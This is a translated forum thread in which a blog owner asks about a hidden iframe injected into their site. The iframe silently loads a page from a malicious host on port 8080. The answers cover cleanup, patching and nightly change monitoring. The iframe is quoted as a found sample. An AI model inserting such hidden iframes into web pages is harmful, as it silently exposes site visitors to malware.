病毒警报社区服务公告

病毒警报社区服务公告

可能重复:
我的服务器被黑了 紧急求助

我看到了这个奇怪的页面,我很确定这不是我创建的:

<iframe src="http://a.bad.site:8080/ts/in.cgi?pepsi106" width=125 height=125 style="visibility: hidden"></iframe>

这到底是从哪里来的?这是病毒吗?

我的博客网站 blog.domain.com 几周前还很好用。但现在,突然间,当我访问我的博客时,它变成了空白页并显示:

This is index.html

谁知道如何永久删除它并防止它再次出现在我的网站上?

答案1

我以前见过这种嵌入的 iframe。肯定有人劫持了你的页面并嵌入了链接。删除你能找到的所有引用,然后更改所有密码

廉价主机从来不愿意承认他们被黑客攻击了,所以我不指望他们能提供太多帮助

答案2

它是跨站点脚本 (XSS) 攻击。开始阅读它们。关于这类事情也有一些很棒的截屏视频/视频。

现在的重点是不要疏忽大意。您的网站存在弱点,必须找到并修复。也不要责怪您的托管公司;最有可能的是,这是您自己的错误,因为选择了糟糕的博客引擎,或者没有让好的博客引擎及时更新最新的安全补丁或版本。

另外:你似乎只知道“病毒”。破解服务器与病毒无关。问题是脆弱性。旧版本的 wordpress 确实存在这些问题 --- 最近有一个非常糟糕的问题,您一定要升级以修补它。您可能需要查看操作系统的自动安全更新、会通过电子邮件向您发送服务器当前漏洞列表的程序,以及/或者订阅会警告您所有最新软件问题的 CVE 网站。

至少,如果您正在管理 Linux 服务器/站点,请订阅一些 Linux 管理站点,这些站点会发布一些不错的文章,教您新技能并警告新问题。XSS 已经存在很长时间了。

答案3

除了 Farseeker 的建议之外,请遵循以下所有说明:

病毒警报社区服务公告


对于听力障碍者,这是该消息的文本版本。

答案4

由于其他人已经充分介绍了如何解决您的小问题,当然最重要的一点是进行一些学习,我不会重复他们的努力。不过,我要补充一点,您需要监控您的网站。显然,黑客攻击可能发生在几周内的任何时间,但您却不知道。

自动监控网站变化的方法有很多,您需要选择一种适合您主机系统的方法。如果您没有主意,我采用的方法是在本地机器上运行一个 shell 脚本,每晚执行以下操作:

  • 使用 wget 镜像整个站点(我无法使用 rsync)
  • 调用 Perl 脚本来解析日志,忽略所选项目(例如缓存目录和文件),构建所有更改的列表。如果检测到任何更改,该列表将通过电子邮件发送给我。
  • 调用另一个脚本,该脚本递归解析 .listing 文件并删除服务器上不再存在的任何本地文件和目录。
  • 重命名站点的旧档案,以便保留前 9 个档案并存档当前版本。

相关内容